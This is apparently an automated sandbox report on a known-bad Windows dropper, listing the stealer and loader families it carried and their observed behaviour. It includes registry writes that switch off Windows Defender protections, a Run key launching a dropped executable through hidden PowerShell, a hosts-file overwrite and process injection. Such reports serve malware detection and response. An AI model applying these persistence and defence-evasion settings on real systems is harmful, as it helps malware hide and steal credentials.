Analysis Overview
SHA256
6fb8cbfcc0237e85d47902eb39dcf6bd9a706e9030e8e208850fd985b5a4468d
Threat Level: Known bad
The file 6fb8cbfcc0237e85d47902eb39dcf6bd9a706e9030e8e208850fd985b5a4468d was found to be: Known bad.
Malicious Activity Summary
Glupteba payload
RedLine
Raccoon Stealer payload
DcRat
SmokeLoader
Amadey
Raccoon
ZGRat
Suspicious use of NtCreateUserProcessOtherParentProcess
Glupteba
RedLine payload
Detect ZGRat V1
Modifies Windows Defender Real-time Protection settings
Drops file in Drivers directory
Stops running service(s)
Downloads MZ/PE file
Reads user/profile data of web browsers
Executes dropped EXE
Checks BIOS information in registry
Windows security modification
Loads dropped DLL
Checks computer location settings
Checks installed software on the system
Adds Run key to start application
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of SetThreadContext
Launches sc.exe
Drops file in Windows directory
Drops file in Program Files directory
Enumerates physical storage devices
Unsigned PE
Program crash
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: MapViewOfSection
Checks SCSI registry key(s)
Creates scheduled task(s)
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: EnumeratesProcesses
Suspicious use of SendNotifyMessage
Uses Task Scheduler COM API
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-10-26 06:20
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-10-26 06:20
Reported
2023-10-26 06:23
Platform
win10v2004-20231020-en
Max time kernel
122s
Max time network
163s
Command Line
Signatures
Amadey
DcRat
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\6fb8cbfcc0237e85d47902eb39dcf6bd9a706e9030e8e208850fd985b5a4468d.exe | N/A |
Detect ZGRat V1
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\8A3E.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\8A3E.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\8A3E.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\8A3E.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\8A3E.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
Raccoon
Raccoon Stealer payload
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SmokeLoader
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 4936 created 3280 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 4936 created 3280 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 4936 created 3280 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 4936 created 3280 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 4936 created 3280 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
ZGRat
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\latestX.exe | N/A |
Stops running service(s)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zSFE22.tmp\Install.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5YX5hh7.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\EF25.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\kos4.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zSFE22.tmp\Install.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\FAEF.exe | N/A |
Reads user/profile data of web browsers
Windows security modification
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\8A3E.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Cv3er48.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\F0BC.exe'\"" | C:\Users\Admin\AppData\Local\Temp\F0BC.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mT2BE44.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Dw1EZ08.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\5464.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uy2bJ6yf.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ed0Mr9BE.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\6fb8cbfcc0237e85d47902eb39dcf6bd9a706e9030e8e208850fd985b5a4468d.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Ti3KL86.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pl5CT78.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\qm8Nc7tt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\vx5hU8bR.exe | N/A |
Checks installed software on the system
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 2636 set thread context of 4172 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Qu36gg4.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 488 set thread context of 1092 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xo6051.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 1500 set thread context of 516 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4fF062EF.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 1164 set thread context of 5376 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Dj81PS4.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 324 set thread context of 2664 | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe |
| PID 1208 set thread context of 5744 | N/A | C:\Users\Admin\AppData\Local\Temp\FAEF.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Program Files (x86)\Drive Tools\is-NF51C.tmp | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-2JUKL.tmp | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-D48GH.tmp | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Drive Tools\zDriveTools.exe | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-2RMV7.tmp | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-3ODBG.tmp | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-155AO.tmp | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-LR12U.tmp | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-PMTJ0.tmp | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-VU1P4.tmp | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-6Q0TS.tmp | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-UNODB.tmp | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-CM61S.tmp | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-23T0I.tmp | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-BRBO7.tmp | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-B8737.tmp | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\Lang\is-64KO5.tmp | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files\Google\Chrome\updater.exe | C:\Users\Admin\AppData\Local\Temp\latestX.exe | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-V6AHL.tmp | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-J04IR.tmp | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-BPL08.tmp | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Drive Tools\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-AI8B8.tmp | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-2EKR1.tmp | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Windows\Wanugegulaho milorahaxah mosuraxupib rusekutokefod bopujune | C:\Users\Admin\AppData\Local\Temp\9675.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Wg83Mn.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Wg83Mn.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Wg83Mn.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zSFE22.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zSFE22.tmp\Install.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Wg83Mn.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\8A3E.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\9675.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\kos4.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
